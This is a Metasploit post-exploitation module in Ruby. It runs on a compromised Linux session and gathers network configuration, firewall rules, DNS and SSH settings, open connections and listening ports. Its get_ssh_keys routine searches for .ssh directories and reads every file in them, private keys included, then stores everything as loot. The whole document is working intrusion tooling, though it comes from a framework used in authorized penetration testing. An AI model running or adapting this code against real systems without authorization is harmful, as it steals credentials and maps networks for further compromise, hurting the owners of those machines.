## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/linux/priv' require 'msf/core/post/linux/system' class Metasploit3 < Msf::Post include Msf::Post::Common include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System def initialize(info={}) super( update_info( info, 'Name' => 'Linux Gather Network Information', 'Description' => %q{ This module gathers network information from the target system IPTables rules, interfaces, wireless information, open and listening ports, active network connections, DNS information and SSH information.}, 'License' => MSF_LICENSE, 'Author' => [ 'ohdae ', # minor additions, modifications & testing 'Stephen Haywood ', # enum_linux ], 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell' ] )) end # Run Method for when run command is issued def run host = get_host user = execute("/usr/bin/whoami") print_status("Module running as #{user}") # Collect data distro = get_sysinfo print_good("Info:") print_good("\t#{distro[:version]}") print_good("\t#{distro[:kernel]}") print_status("Collecting data...") nconfig = execute("/sbin/ifconfig -a") routes = execute("/sbin/route -e") iptables = execute("/sbin/iptables -L") iptables_nat = execute("/sbin/iptables -L -t nat") iptables_man = execute("/sbin/iptables -L -t mangle") resolv = cat_file("/etc/resolv.conf") sshd_conf = cat_file("/etc/ssh/sshd_config") hosts = cat_file("/etc/hosts") connections = execute("/usr/bin/lsof -nPi") wireless = execute("/sbin/iwconfig") open_ports = execute("/bin/netstat -tulpn") updown = execute("ls -R /etc/network") ssh_keys = get_ssh_keys # Save Enumerated data save("Network config", nconfig) save("Route table", routes) save("Firewall config", iptables + iptables_nat + iptables_man) save("DNS config", resolv) save("SSHD config", sshd_conf) save("Host file", hosts) save("SSH keys", ssh_keys) unless ssh_keys.empty? save("Active connections", connections) save("Wireless information", wireless) save("Listening ports", open_ports) save("If-Up/If-Down", updown) end # Save enumerated data def save(msg, data, ctype="text/plain") ltype = "linux.enum.network" loot = store_loot(ltype, ctype, session, data, nil, msg) print_status("#{msg} stored in #{loot.to_s}") end # Get host name def get_host case session.type when /meterpreter/ host = sysinfo["Computer"] when /shell/ host = session.shell_command_token("hostname").chomp end print_status("Running module against #{host}") return host end def execute(cmd) vprint_status("Execute: #{cmd}") output = cmd_exec(cmd) return output end def cat_file(filename) vprint_status("Download: #{filename}") output = read_file(filename) return output end def get_ssh_keys keys = [] #Look for .ssh folder, "~/" might not work everytime dirs = execute("/usr/bin/find / -maxdepth 3 -name .ssh").split("\n") ssh_base = '' dirs.each do |d| if d =~ /(^\/)(.*)\.ssh$/ ssh_base = d break end end # We didn't find .ssh :-( return [] if ssh_base == '' # List all the files under .ssh/ files = execute("/bin/ls -a #{ssh_base}").chomp.split() files.each do |k| next if k =~/^(\.+)$/ this_key = cat_file("#{ssh_base}/#{k}") keys << this_key end return keys end end